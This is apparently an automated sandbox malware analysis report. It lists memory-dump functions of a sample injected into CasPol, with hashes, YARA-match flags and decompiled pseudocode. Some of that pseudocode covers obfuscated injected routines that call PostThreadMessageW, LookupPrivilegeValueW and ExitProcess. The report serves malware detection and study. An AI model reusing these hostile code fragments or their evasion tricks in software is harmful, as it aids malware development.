                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9f6b9d5bf9c446dd1758783bb41457daa799ab180bb442e4537beb95e848b83a
                                                                        • Instruction ID: db02e5eb289a22092d2a3e123280c06b14dc2c48f1087b9a15020beb1158e0c8
                                                                        • Opcode Fuzzy Hash: 9f6b9d5bf9c446dd1758783bb41457daa799ab180bb442e4537beb95e848b83a
                                                                        • Instruction Fuzzy Hash: B89002A174500442D10161DA4414B060005E7E1341F51C026E1054559DC7B9CC567166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a9b81d0c8e439d6c6e943486b5307b8272dd63a40e8b6122a8003d5c7553d693
                                                                        • Instruction ID: 02030818c28be42240cb4a7f94c9c408c26e47f9381a1de2c1f3f6a6cb99600d
                                                                        • Opcode Fuzzy Hash: a9b81d0c8e439d6c6e943486b5307b8272dd63a40e8b6122a8003d5c7553d693
                                                                        • Instruction Fuzzy Hash: 3490027160500413D11261DA45047070009A7D0281F91C423A041455DDD7F68956B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: fba8b16cad757dec6f13235156950dcf0e817a90ffc27905ff112acbfcb47562
                                                                        • Instruction ID: 7c332a59f96361c2f5d9b954fc7c36f7873a95e4aa59d3ef65ceb08907ecc338
                                                                        • Opcode Fuzzy Hash: fba8b16cad757dec6f13235156950dcf0e817a90ffc27905ff112acbfcb47562
                                                                        • Instruction Fuzzy Hash: 75900261646041525546B1DA44045074006B7E0281791C023A1404955CC6B6985AE661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 855ab699d2aa6a94a6b9a0b899d7bd6d09354059badec10a6f76fd951e392184
                                                                        • Instruction ID: b79df3e3779f0c30851a059ba9d97b5aa81ef3b21db905113a914a94bf858ad9
                                                                        • Opcode Fuzzy Hash: 855ab699d2aa6a94a6b9a0b899d7bd6d09354059badec10a6f76fd951e392184
                                                                        • Instruction Fuzzy Hash: 0F900261A0500502D10271DA4404616000AA7D0281F91C033A101455AECBB58996B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: eb5de665f96c636246a80b4e4dfc93eb6e370ccedacb22abe9a035784e0f7cea
                                                                        • Instruction ID: 912b7dbeb22072347d626d315aba71e293c4b1c9ede996b6ffb585b9d500e42a
                                                                        • Opcode Fuzzy Hash: eb5de665f96c636246a80b4e4dfc93eb6e370ccedacb22abe9a035784e0f7cea
                                                                        • Instruction Fuzzy Hash: FF900261A0500042414171EA88449064005BBE1251751C132A0988555DC6F9886966A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 05c80f4efc22c80ca0c7093ffbeb4a83325b2550c9207cc0af75d68c206b3260
                                                                        • Instruction ID: 433215624b3ccb8dd2515de18e319fbeec6b10ab2fe66f9ec7cb937c3e921694
                                                                        • Opcode Fuzzy Hash: 05c80f4efc22c80ca0c7093ffbeb4a83325b2550c9207cc0af75d68c206b3260
                                                                        • Instruction Fuzzy Hash: 5190027160540402D10161DA481470B0005A7D0342F51C022A115455ADC7B5885575B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 99aa22e6b8204fde8089400411e1b8a4a96aee4b36f47b30487fbb557581eac5
                                                                        • Instruction ID: 4bcb179e95c25ad39d2d12f52b20e0749794e335c5ec52bd6dbd27fd44f5dfe5
                                                                        • Opcode Fuzzy Hash: 99aa22e6b8204fde8089400411e1b8a4a96aee4b36f47b30487fbb557581eac5
                                                                        • Instruction Fuzzy Hash: F990026161580042D20165EA4C14B070005A7D0343F51C126A0144559CCAB588656561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b97c0da23f48aaabcb60a3ff6c0715b4e6c5dba1b0caa47835b1220146b3e56f
                                                                        • Instruction ID: 06caff9ea86a1f8adc126000f08f7e2c41278e297912ee1c759291f7e3fd852d
                                                                        • Opcode Fuzzy Hash: b97c0da23f48aaabcb60a3ff6c0715b4e6c5dba1b0caa47835b1220146b3e56f
                                                                        • Instruction Fuzzy Hash: 69900265615000030106A5DA07045070046A7D5391351C032F1005555CD7B188656161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e86e62bccbab8f00e5f1b1dd39f17d4ae2850451ea44694c2f2c17b0c384f479
                                                                        • Instruction ID: 48c811d70fc591884f5ea55c9215bdf503f60a8cff8e2404a25d477b47e409ae
                                                                        • Opcode Fuzzy Hash: e86e62bccbab8f00e5f1b1dd39f17d4ae2850451ea44694c2f2c17b0c384f479
                                                                        • Instruction Fuzzy Hash: 219002A160600003410671DA4414616400AA7E0241B51C032E1004595DC6B588957165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ef3081cc8e2fa28d86bbab5512e8fd8b23c6778ad6c73aa3cb3a4b5c4087ede8
                                                                        • Instruction ID: 38d6a6c4da5e1587c5358304700e9e013d426cad6666b0f6b0d5f0cac16ea1e2
                                                                        • Opcode Fuzzy Hash: ef3081cc8e2fa28d86bbab5512e8fd8b23c6778ad6c73aa3cb3a4b5c4087ede8
                                                                        • Instruction Fuzzy Hash: B290027160500402D10165DA54086460005A7E0341F51D022A501455AEC7F588957171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bed082f230c48019d78f4e4eb40c61b45068506e2a0f170bb43168cae91b32e3
                                                                        • Instruction ID: cab2da9b76e9f81506bea1dcdce045972739dfb44244d5eca0b3641aad1f4df9
                                                                        • Opcode Fuzzy Hash: bed082f230c48019d78f4e4eb40c61b45068506e2a0f170bb43168cae91b32e3
                                                                        • Instruction Fuzzy Hash: FD90026170500003D14171DA54186064005F7E1341F51D022E0404559CDAB5885A6262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 90c3eb3e51b38cb98f7cb857878dca68611a203a54b0febc92df4d4c350ae48f
                                                                        • Instruction ID: 118858fe3636ce931bfb6a127778f7bc1ca645a05f48107f87e343cb3a631c2c
                                                                        • Opcode Fuzzy Hash: 90c3eb3e51b38cb98f7cb857878dca68611a203a54b0febc92df4d4c350ae48f
                                                                        • Instruction Fuzzy Hash: E790026961700002D18171DA540860A0005A7D1242F91D426A000555DCCAB5886D6361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 972d06a2f26ad29323fb4b819d5c7f6f8b45ec0afcbf293bd65b26bfa424c937
                                                                        • Instruction ID: 021b40cfbc5fc1bb22203cca1631537ce21537e8a7eb4fcc6c01c7ba83c91287
                                                                        • Opcode Fuzzy Hash: 972d06a2f26ad29323fb4b819d5c7f6f8b45ec0afcbf293bd65b26bfa424c937
                                                                        • Instruction Fuzzy Hash: B990027171514402D11161DA84047060005A7D1241F51C422A081455DDC7F588957162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d533d376e36eb29eaa5d5b15ac6a22b7c147e6fa3603997d1f9d4f7993f03b14
                                                                        • Instruction ID: 37a2504066af3394248f4ff1fcb8813751b981b25bb0ca880f40200290e6047d
                                                                        • Opcode Fuzzy Hash: d533d376e36eb29eaa5d5b15ac6a22b7c147e6fa3603997d1f9d4f7993f03b14
                                                                        • Instruction Fuzzy Hash: 7990027160500802D18171DA440464A0005A7D1341F91C026A0015659DCBB58A5D77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 94a2b3b7ec01ac4ebb5985ff9020ee625dabfdf1776110d1951e48a1fd07dce0
                                                                        • Instruction ID: 12285a4464ce6f5b006601b1d8a452d9d9bcb1b94eaaaad3828713909394870b
                                                                        • Opcode Fuzzy Hash: 94a2b3b7ec01ac4ebb5985ff9020ee625dabfdf1776110d1951e48a1fd07dce0
                                                                        • Instruction Fuzzy Hash: 0F90027160508802D11161DA840474A0005A7D0341F55C422A441465DDC7F588957161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E903 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 3 41e903-41e91c 4 41e922-41e92b ExitProcess 3->4 5 41e91d call 41f223 3->5 5->4
                                                                        C-Code - Quality: 100%
                                                                        			E0041E903(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F223( *((intOrPtr*)(_a4 + 0x980)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x980)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                        0x0041e906
                                                                        0x0041e91d
                                                                        0x0041e92b

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E92B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: G5@
                                                                        • API String ID: 621844428-1585037681
                                                                        • Opcode ID: 617ccf727b282b404c2f8b27e3b33080a1333c516f09a61b6c5667a9e896709c
                                                                        • Instruction ID: cfca8e1907c1f24ac97838efb92421b828cf6b07f9a05c4ff859c04d5774fe7b
                                                                        • Opcode Fuzzy Hash: 617ccf727b282b404c2f8b27e3b33080a1333c516f09a61b6c5667a9e896709c
                                                                        • Instruction Fuzzy Hash: 83D0C2316002047BCB20DBC8DC45FD377ACDF45650F0080A5BA0C5B242C530BA00C7E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E8FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6 41e8fc-41e92b call 41f223 ExitProcess
                                                                        C-Code - Quality: 100%
                                                                        			E0041E8FC(intOrPtr _a4, int _a8) {

				_t7 = _a4;
				E0041F223( *((intOrPtr*)(_a4 + 0x980)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x980)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                        0x0041e906
                                                                        0x0041e91d
                                                                        0x0041e92b

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E92B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: G5@
                                                                        • API String ID: 621844428-1585037681
                                                                        • Opcode ID: b5eb8c7284e0b1afb1aaa59d8cfe6a5d791b4cfa1d429cfee80398c8dfa6d21e
                                                                        • Instruction ID: 25254aa45f2800970d74b2d606c2a39324453796c864d9a28a6af291f1becf86
                                                                        • Opcode Fuzzy Hash: b5eb8c7284e0b1afb1aaa59d8cfe6a5d791b4cfa1d429cfee80398c8dfa6d21e
                                                                        • Instruction Fuzzy Hash: 3CE0C2316002007BC7209F84CC86FD73768AF45750F048468B9185B382CA75EA04C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040984B Relevance: 1.6, APIs: 1, Instructions: 69threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 251 40984b-40984c 252 40984e-409852 251->252 253 40981f-409822 251->253 254 409854-4098a7 call 4201f3 call 420ca3 call 40ced3 call 402de3 call 4195b3 252->254 255 4098a9-4098ba PostThreadMessageW 252->255 253->251 254->255 257 4098e0-4098e6 254->257 255->257 258 4098bc-4098dd call 40c5a3 255->258 258->257
                                                                        C-Code - Quality: 50%
                                                                        			E0040984B(void* __eflags, long _a8, signed int _a12) {
				char _v59;
				char _v60;
				signed int __esi;
				void* __ebp;
				void* _t12;
				void* _t13;
				void* _t17;

				if(__eflags != 0) {
					asm("cld");
					_push(_t19);
					_t13 = E0041FB83(_t12, _t17, 0x11c6f95e);
					return E0041FA43(_t17) + _t13 + 0x1000;
				} else {
					_pop(__edi);
					asm("repe mov dl, 0x74");
					asm("loop 0x57");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax =  &_v59;
					_v60 = 0;
					__eax = E004201F3( &_v59, 0, 0x3f);
					__ecx =  &_v60;
					__eax = E00420CA3( &_v60, 3);
					__ebx = _a12;
					__edx =  &_v60;
					__esi = __ebx + 0x20;
					__eax = E0040CED3(__eflags, __ebx + 0x20,  &_v60); // executed
					__edi = __eax;
					__eax = E00402DE3(__edx, __eax, 0x40fa3591);
					__eax = E004195B3(__ebx + 0x20, __edi, 0, 0, __eax);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = __ebx;
							__eax = E0040C5A3(1, 8, __ebx);
							__eax = __al & 0x000000ff;
							__ecx = __ebp + __eax - 0x40;
							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
						}
					}
					_pop(__edi);
					_pop(__esi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}










                                                                        0x0040984c
                                                                        0x00409822
                                                                        0x00409823
                                                                        0x00409829
                                                                        0x00409840
                                                                        0x0040984e
                                                                        0x0040984e
                                                                        0x0040984f
                                                                        0x00409852
                                                                        0x00409853
                                                                        0x00409854
                                                                        0x00409856
                                                                        0x00409859
                                                                        0x0040985a
                                                                        0x0040985b
                                                                        0x0040985e
                                                                        0x00409864
                                                                        0x00409868
                                                                        0x0040986d
                                                                        0x00409873
                                                                        0x00409878
                                                                        0x0040987b
                                                                        0x0040987f
                                                                        0x00409883
                                                                        0x0040988d
                                                                        0x0040988f
                                                                        0x0040989b
                                                                        0x004098a0
                                                                        0x004098a5
                                                                        0x004098a7
                                                                        0x004098a9
                                                                        0x004098b6
                                                                        0x004098b8
                                                                        0x004098ba
                                                                        0x004098bd
                                                                        0x004098c8
                                                                        0x004098cd
                                                                        0x004098d3
                                                                        0x004098de
                                                                        0x004098de
                                                                        0x004098ba
                                                                        0x004098e0
                                                                        0x004098e1
                                                                        0x004098e2
                                                                        0x004098e3
                                                                        0x004098e5
                                                                        0x004098e6
                                                                        0x004098e6

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(00008636,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: c3635962a35c2da16ccf53f9b7e33bcf54d1b93ac691d575dc8918acee59a986
                                                                        • Instruction ID: 0b434b31da4b3ab7f4c4012a727e40b77ef3b60e89b6b7e7875c55ce8a6f77e7
                                                                        • Opcode Fuzzy Hash: c3635962a35c2da16ccf53f9b7e33bcf54d1b93ac691d575dc8918acee59a986
                                                                        • Instruction Fuzzy Hash: 0911CD72A4021576E7106695DC82FFF735C9B41754F14413AFB047A1C2D6ECAE0686E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409853 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 270 409853-409864 271 40986d-4098a7 call 420ca3 call 40ced3 call 402de3 call 4195b3 270->271 272 409868 call 4201f3 270->272 281 4098e0-4098e6 271->281 282 4098a9-4098ba PostThreadMessageW 271->282 272->271 282->281 283 4098bc-4098dd call 40c5a3 282->283 283->281
                                                                        C-Code - Quality: 84%
                                                                        			E00409853(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __edi;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E004201F3( &_v67, 0, 0x3f);
				E00420CA3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CED3(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402DE3( &_v68, _t13, 0x40fa3591));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5A3(1, 8, _t19 + 0x730) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                                                        0x00409853
                                                                        0x00409864
                                                                        0x00409868
                                                                        0x00409873
                                                                        0x00409878
                                                                        0x00409883
                                                                        0x0040989b
                                                                        0x004098a0
                                                                        0x004098a7
                                                                        0x004098a9
                                                                        0x004098b6
                                                                        0x004098ba
                                                                        0x00000000
                                                                        0x004098de
                                                                        0x004098ba
                                                                        0x004098e6

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(00008636,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: dafd9375c071f31cdbe3e20ae08b8a341ca6574c2996ce21f49670a253e36335
                                                                        • Instruction ID: e773a7ee659482fa6fe3328f06cdbd4708deb785414366536410655b291b0b06
                                                                        • Opcode Fuzzy Hash: dafd9375c071f31cdbe3e20ae08b8a341ca6574c2996ce21f49670a253e36335
                                                                        • Instruction Fuzzy Hash: CB01C872A4022876E71066919C82FFF376C9B40B44F040129FE04BA1C2D6E8AE0586E9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041EA14 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 308 41ea14-41ea22 309 41ea24-41ea3d call 41f223 308->309 310 41ea79-41ea7c 308->310 314 41ea42-41ea57 LookupPrivilegeValueW 309->314 312 41ea82-41ea93 310->312 313 41ea7d call 41f223 310->313 313->312
                                                                        C-Code - Quality: 25%
                                                                        			E0041EA14(signed int __eax, signed int __esi, void* _a4, void* _a8, void* _a12, void* _a16) {
				void* _v0;
				signed int _t13;

				_push(__eax);
				_t13 = __eax ^  *(__esi + 0xa);
				asm("aaa");
				asm("lock add al, 0x90");
				if ((__esi & 0xa4ccb534) > 0) goto L3;
			}





                                                                        0x0041ea14
                                                                        0x0041ea15
                                                                        0x0041ea18
                                                                        0x0041ea1f
                                                                        0x0041ea22

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEA5,0040FEA5,?,00000000,?,?), ref: 0041EA53
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                        • Instruction ID: dc27cc2fb198ade2d17280a16e8467aa7d15497bed9ff9f470af9842353000fa
                                                                        • Opcode Fuzzy Hash: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                        • Instruction Fuzzy Hash: 93F081B5A042046FC710DF99EC45EE7376DEF84354F05885AFD088B242D235E9118BE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E8B5 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 325 41e8b5-41e8b9 326 41e8d4-41e8d9 325->326 327 41e8bb-41e8d2 325->327 328 41e8df-41e8f4 RtlFreeHeap 326->328 329 41e8da call 41f223 326->329 327->326 329->328
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
